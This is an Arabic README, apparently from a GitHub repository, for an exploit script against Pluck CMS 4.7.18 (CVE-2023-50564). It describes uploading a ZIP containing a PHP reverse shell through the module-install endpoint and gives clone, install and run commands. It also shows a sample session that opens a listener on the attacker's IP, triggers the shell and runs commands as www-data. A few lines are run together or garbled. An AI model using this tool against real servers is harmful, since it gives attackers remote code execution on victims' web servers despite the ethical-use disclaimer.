
يستغل هذا السكربت ميزة رفع الملفات في نظام Pluck CMS الإصدار 4.7.18 لرفع ملف PHP خبيث، مما يتيح الوصول عن بُعد عبر قشرة عكسية (reverse shell). وبمجرد رفعه، يمنح هذا الباب الخلفي المهاجم وصولًا إلى الخادم بصلاحيات خادم الويب، مما يسمح بتنفيذ إجراءات إضافية داخل النظام أو الشبكة.
يستغل هذا السكربت ثغرة رفع ملفات تعسفية موثّقة في Pluck CMS v4.7.18 (CVE-2023-50564). من خلال استغلال هذه الثغرة، يمكن لمهاجم موثّق رفع ملف PHP خبيث، مما يتيح تنفيذ أكواد تعسفية (في هذه الحالة، شيل عكسي).
توجد الثغرة في نقطة النهاية /admin.php?action=installmodule، والتي تسمح لمستخدم موثّق برفع ملف ZIP يحتوي على ملفات تعسفية. من خلال رفع ملف PHP خبيث، ينشئ هذا الاستغلال شيلًا عكسيًا يعود إلى المهاجم.
pip install requestspip install requests-toolbeltيتطلب هذا السكربت أيضًا تسجيل دخول صالحًا لمثيل Pluck CMS، بما في ذلك عنوان URL الخاص بالهدف وكلمة المرور.
su, sudo -l) ويسمح للمستخدم بإدخال البيانات يدويًا.git clone https://github.com/yourusername/Pluck-CMS-Exploit.git
cd Pluck-CMS-Exploit
pip install requests requests-toolbelt
قم بتشغيل الاستغلال باستخدام Python:
python3 exploit.py
مثال:
$ python3 exploit.py
Enter the target URL (e.g., example.com): pluckcms.vulnerable.com
Enter the password for target authentication: password123
Enter your IP (for reverse shell): 10.10.14.5
Enter the port to listen on (for reverse shell): 4444
[*] Authenticating to the target...
[+] Authentication successful.
[*] Generating reverse shell PHP file...
[+] Reverse shell PHP file created successfully as 'shell.php'.
[*] Creating ZIP payload...
[+] ZIP file created as 'payload.zip'.
[*] Starting reverse shell listener on 10.10.14.5:4444 ...
[*] Uploading payload to the target...
[+] Payload uploaded successfully.
[*] Triggering reverse shell at: http://pluckcms.vulnerable.com/data/modules/payload/shell.php
[+] Connection received from ('10.10.10.1', 55678)
Shell> whoami
www-data
هذا السكربت مخصص للأغراض التعليمية والاختراق الأخلاقي. يجب استخدامه فقط في البيئات التي لديك فيها إذن صريح للاختبار. المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة.
هذا المشروع مرخّص بموجب رخصة MIT - راجع MIT License للتفاصيل.
لا تتردد في عمل fork للمستودع وتقديم pull requests. لأي مشكلات أو طلبات ميزات، يرجى فتح issue على GitHub.